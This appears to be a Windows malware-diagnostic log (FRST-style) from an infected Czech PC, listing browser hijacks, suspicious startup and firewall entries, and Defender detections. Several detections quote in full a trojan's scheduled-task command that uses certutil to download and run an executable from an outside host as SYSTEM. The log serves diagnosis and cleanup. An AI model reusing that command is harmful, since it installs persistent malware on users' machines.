ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\42072:.repos [616623]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
SearchScopes: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 04:43 - 2020-09-12 18:14 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\42072\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\103122316 (2).jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "seznam-listicka-distribuce"
HKLM\...\StartupApproved\Run: => "Launch LCore"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "rfxgnkvq"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "CloudNet"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Web Companion"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Mobigame Playstore"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{84300298-B7CB-433F-910C-B145F679ED07}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [TCP Query User{019068A6-6063-42C6-856F-7D4F25FD45F9}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [UDP Query User{8D828ACF-4AEA-44C5-A1F6-B4490594C84C}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{5FE5D572-B26D-4CAE-AC2E-D12DB7450D50}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{562DE85C-29FE-45F0-AEF0-B6B7F1FA157C}] => (Allow) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{B25BFF2E-534B-4514-B181-D007490F890E}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{320FCA28-90D8-46D0-A192-3787C2D30DA8}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD11177B-E329-4F0A-AB7C-A7902F91FD7D}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DB43DC0B-5959-4385-8DA3-184F468ABCBD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{64E88E64-8F50-4D8E-AE6C-A49D73EE61AC}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{00A8BACB-445A-464B-9377-5E105021126D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{2E007B32-DF29-4372-BAD7-4AF580BCCD5E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [TCP Query User{0B9FD880-9293-4C01-912A-9425048B8CA0}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [{A3C4A266-B549-4CDD-9FD9-8CBB97C57BF0}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{3EAB28E6-A364-4882-8481-895A574BF274}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [UDP Query User{EAB50D73-12CA-4F3B-87F3-554786A108B0}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [TCP Query User{5DBABCD5-4461-4ADE-B726-1526E5409DA3}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [UDP Query User{58A80BB9-3D27-47F4-AF59-9C11F11B08C1}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [TCP Query User{67D1C637-5380-48E9-86BE-42E95B7CA25E}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [UDP Query User{15D6B20B-C526-4084-8018-D2BDB13DC0A7}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{71C01058-FA98-4143-BD85-58F8754636AD}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{D37B3EDE-1653-4473-9978-72B09F481D20}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7A8ED71F-1BD3-4647-B441-FDBE38F625C8}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{551B3597-06A3-471D-9767-EFE87BC8B93C}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [TCP Query User{F32A8597-1895-4920-BEBF-8B41E9DC6198}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [{C04E4B27-1BB9-4D05-B483-6B9D3B7A6E43}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{6508FEBA-543A-49C7-8328-EB56538D3FDF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E4093EED-CD4A-4AC1-B72D-97A4BEF6A8D4}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6F6B4D3D-DC59-4970-A54A-417118EFBC88}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B1B1EA4E-71ED-4AA2-A771-6C1B62B2246F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D2097B25-660C-449A-9396-AF97B8F5BBD1}] => (Allow) C:\Program Files\MobiGame\player\mobiplayer.exe (Game Player) [File not signed]
FirewallRules: [{F3CDFAC5-A975-48F4-9DAB-369F7F2E4853}] => (Allow) C:\Program Files\MobiGame\vbox\vboxheadless.exe (Iron Entertainment Inc. -> Oracle Corporation)
FirewallRules: [{93C34D1D-8364-41F3-844F-1694693AB6AF}] => (Allow) C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe () [File not signed]
FirewallRules: [{96DC6731-E2CF-4F11-BC78-0A40F04761A0}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{103F7BC9-F0D2-47F2-AE12-488E8CCB3AE5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{E51FC64F-7EDE-49D5-A7D8-3BAEFD4D43A5}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{2E0F18A4-8866-418B-A129-0E740AFCB831}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A1A1877F-2977-4C42-BC94-5733B7BC5052}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{C57B14A1-38E9-4505-B515-CF973F43D220}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{7A5BBB51-4EC6-4223-9825-D742308E06AC}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{17AB0CF4-6BF5-4355-855D-FD1B1B3F4558}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{B77DDFF5-FD77-4EDA-997E-E38211DFD8B7}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{42D3A007-3F32-4A37-BFAE-2BEA8902C5D4}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [{32366988-A515-41D3-B0D4-41DED8B526DC}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EEEA3F19-1A43-4849-9875-7F01013DC70A}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{D44B9937-30AF-4D9B-B4E1-A31DA800E4C4}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{0BBCD1EB-1959-44E7-AEF1-C028B8F6D5DE}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
==================== Restore Points =========================
03-09-2020 09:10:42 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Standardní klávesnice PS/2
Description: Standardní klávesnice PS/2
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardní klávesnice)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Event log errors: ========================
Application errors:
==================
Error: (10/20/2020 09:17:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Informace služby Stínová kopie svazku: Server COM s identifikátorem CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} a názvem CEventSystem nelze spustit. [0x8007045b, Probíhá vypnutí systému.
]
Error: (10/20/2020 09:15:38 PM) (Source: ESENT) (EventID: 447) (User: )
Description: svchost (6664,D,29) SRUJet: A bad page link (error -338) has been detected in a B-Tree (ObjectId: 21, PgnoRoot: 95) of database C:\WINDOWS\system32\SRU\SRUDB.dat (671 => 3078, 21).
Tag: BtDownClinesLowEmpty
Fatal: 1
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 65536 (0x0000000000010000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (10/20/2020 10:10:00 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:09:19 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:50 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Windows Defender:
===================================
Date: 2020-10-20 21:18:45.1140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:56:36.4060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:53:27.5720000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:45:43.8350000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:42:01.0060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 21:27:56.0780000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0750000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0740000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0390000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
